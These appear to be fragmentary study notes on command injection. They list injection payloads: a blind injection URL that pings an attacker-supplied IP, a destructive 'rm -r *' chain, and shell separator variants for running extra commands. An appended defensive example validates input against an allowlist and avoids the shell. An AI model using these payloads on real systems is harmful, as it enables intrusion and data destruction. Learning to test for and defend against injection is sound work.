Command Injection
Command Injections

Result-Based Command Injection

• In result-based command injection, the response shows the command's output directly, which means the user can see the outcome of the arbitrary command they entered.

• Example: In the file submission form, you can see the input you submitted returned back to you. Now if you delete it, the following will happen:
Error when creating a file? Why?

Let's check whether it has command injection or not by entering an OS command, a; ls;, in the input. This does not show any effect in the response, but it also does not throw an error. Now we know that it allows a semicolon.
Blind Command Injection

• /?search=

• Payload: http://www.mytarget.com/?search=%00{.exec|ping <MyIP>

• Mitigation: never call out to OS commands from application-layer code. (Use Regex)

Result-Based Command Injection

• Commands that can cause harm: X; rm -r *

• # Both Unix and Windows supported

• ls||id; ls ||id; ls|| id; ls || id # Execute both

• ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)

• ls&&id; ls &&id; ls&& id; ls && id # Execute the second only if the first finishes OK

• ls&id; ls &id; ls& id; ls & id # Execute both, but you can only see the output of the second

• ls %0A id # %0A Execute both (RECOMMENDED)
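A defensive sketch of the mitigation bullet and the separator list above, added here as an example and not part of the original slides: it validates a hypothetical search parameter against an allowlist regex and shows that a value passed as a single argv element, with no shell involved, stays literal. The allowlist policy, function names and sample inputs are assumptions made for illustration.

```python
import re
import subprocess
import sys
from urllib.parse import unquote

# Assumed policy for a hypothetical "search" parameter:
# letters, digits, space, underscore, dot, hyphen; 1 to 64 characters.
ALLOWED = re.compile(r"[A-Za-z0-9 _.\-]{1,64}")

def validate_search(raw: str) -> str:
    """URL-decode once, then accept only allowlisted characters."""
    value = unquote(raw)
    # fullmatch (not match with '$') so a trailing newline cannot slip through.
    if not ALLOWED.fullmatch(value):
        raise ValueError(f"rejected input: {value!r}")
    return value

def echo_without_shell(arg: str) -> str:
    """Pass the value as one argv element; no shell ever parses it."""
    # Stand-in for a real helper program: a child Python that writes argv[1].
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", arg],
        capture_output=True, text=True, check=True, timeout=10,
    )
    return proc.stdout

# Constructed sample inputs: one benign value plus the forms listed on this page.
SAMPLES = ["report 2024.txt", "a; ls;", "ls||id", "ls|id", "ls&&id", "ls&id",
           "ls %0A id", "%00{.exec|ping <MyIP>"]

def classify(samples):
    """Return {input: 'accepted' | 'rejected'} under the allowlist."""
    results = {}
    for s in samples:
        try:
            validate_search(s)
            results[s] = "accepted"
        except ValueError:
            results[s] = "rejected"
    return results

if __name__ == "__main__":
    for sample, verdict in classify(SAMPLES).items():
        print(f"{verdict:9} {sample!r}")
    # The semicolons reach the child as plain text, not as command separators.
    print(repr(echo_without_shell("a; ls;")))
```

An allowlist is used rather than a blocklist of separators because the list of shell metacharacters differs between platforms and encodings.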


ATTACK (CHANGING PASSWORDS AND USERNAMES)

Images as png.txt: File corruption (Man in the Middle)
